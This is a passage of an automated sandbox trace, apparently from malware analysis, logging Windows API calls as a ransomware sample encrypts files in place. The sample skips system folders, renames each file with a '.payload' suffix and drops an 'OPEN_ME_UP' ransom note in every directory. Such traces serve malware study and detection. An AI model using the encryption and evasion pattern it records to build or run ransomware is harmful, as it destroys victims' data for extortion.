pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.571] GetProcessHeap () returned 0x5e0000 [0058.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.571] FindNextFileW (in: hFindFile=0x6065a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.571] FindClose (in: hFindFile=0x6065a0 | out: hFindFile=0x6065a0) returned 1 [0058.571] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1031\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.571] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1031\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.572] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.573] CloseHandle (hObject=0x430) returned 1 [0058.573] GetProcessHeap () returned 0x5e0000 [0058.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.573] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1032", cAlternateFileName="")) returned 1 [0058.573] lstrcmpiW (lpString1="1032", lpString2="Windows") returned -1 [0058.573] lstrcmpiW (lpString1="1032", lpString2="$Recycle.bin") returned 1 [0058.573] lstrcmpiW (lpString1="1032", lpString2="System Volume Information") returned -1 [0058.573] lstrcmpiW (lpString1="1032", lpString2="Program Files") returned -1 [0058.573] lstrcmpiW (lpString1="1032", lpString2="Program Files (x86)") returned -1 [0058.573] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032") returned 30 [0058.573] lstrcmpW (lpString1="1032", lpString2=".") returned 1 [0058.573] lstrcmpW (lpString1="1032", lpString2="..") returned 1 [0058.573] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.573] GetProcessHeap () returned 0x5e0000 [0058.573] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.573] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\*") returned 32 [0058.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6066e0 [0058.574] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.574] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.574] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.574] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.574] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.574] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\.") returned 32 [0058.574] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.574] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.574] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.574] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.574] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.574] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.574] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.574] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\..") returned 33 [0058.574] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.574] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.574] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.574] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.574] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.574] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.574] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.574] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.574] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 39 [0058.575] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.575] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.575] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.575] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.575] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.575] GetTickCount () returned 0x114f156 [0058.575] GetTickCount () returned 0x114f156 [0058.575] GetTickCount () returned 0x114f156 [0058.575] GetTickCount () returned 0x114f156 [0058.575] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.576] GetProcessHeap () returned 0x5e0000 [0058.576] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.576] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x22ac, lpOverlapped=0x0) returned 1 [0058.577] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffdd54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.577] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x22ac, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x22ac, lpOverlapped=0x0) returned 1 [0058.577] GetProcessHeap () returned 0x5e0000 [0058.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.577] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.577] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.577] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.577] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.578] CloseHandle (hObject=0x438) returned 1 [0058.578] GetProcessHeap () returned 0x5e0000 [0058.578] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.578] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.580] GetProcessHeap () returned 0x5e0000 [0058.580] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.580] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.580] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.581] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.581] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.581] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.581] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.581] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 48 [0058.581] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.581] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.581] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.581] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.581] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.581] GetTickCount () returned 0x114f156 [0058.581] GetTickCount () returned 0x114f156 [0058.581] GetTickCount () returned 0x114f156 [0058.581] GetTickCount () returned 0x114f156 [0058.581] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.581] GetProcessHeap () returned 0x5e0000 [0058.581] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.581] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.583] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.584] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.584] GetProcessHeap () returned 0x5e0000 [0058.584] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.584] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.584] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.584] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.584] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.584] CloseHandle (hObject=0x438) returned 1 [0058.587] GetProcessHeap () returned 0x5e0000 [0058.587] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.587] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.587] GetProcessHeap () returned 0x5e0000 [0058.588] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.588] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.588] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.588] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.588] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.588] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.588] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.588] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 49 [0058.588] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.588] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.588] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.588] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.588] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.588] GetTickCount () returned 0x114f166 [0058.588] GetTickCount () returned 0x114f166 [0058.588] GetTickCount () returned 0x114f166 [0058.588] GetTickCount () returned 0x114f166 [0058.588] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.588] GetProcessHeap () returned 0x5e0000 [0058.588] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.588] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.590] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.590] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.590] GetProcessHeap () returned 0x5e0000 [0058.590] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.590] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.590] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.591] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.591] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.591] CloseHandle (hObject=0x438) returned 1 [0058.592] GetProcessHeap () returned 0x5e0000 [0058.592] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.592] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.592] GetProcessHeap () returned 0x5e0000 [0058.592] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.592] FindNextFileW (in: hFindFile=0x6066e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.592] FindClose (in: hFindFile=0x6066e0 | out: hFindFile=0x6066e0) returned 1 [0058.593] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1032\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.593] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1032\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.593] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.594] CloseHandle (hObject=0x430) returned 1 [0058.594] GetProcessHeap () returned 0x5e0000 [0058.594] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.594] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1033", cAlternateFileName="")) returned 1 [0058.594] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0058.594] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0058.594] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0058.594] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0058.594] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0058.594] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033") returned 30 [0058.594] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0058.594] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0058.594] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.594] GetProcessHeap () returned 0x5e0000 [0058.594] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.594] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\*") returned 32 [0058.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6067e0 [0058.595] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.595] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.595] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.595] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.595] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.595] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1033\\.") returned 32 [0058.595] 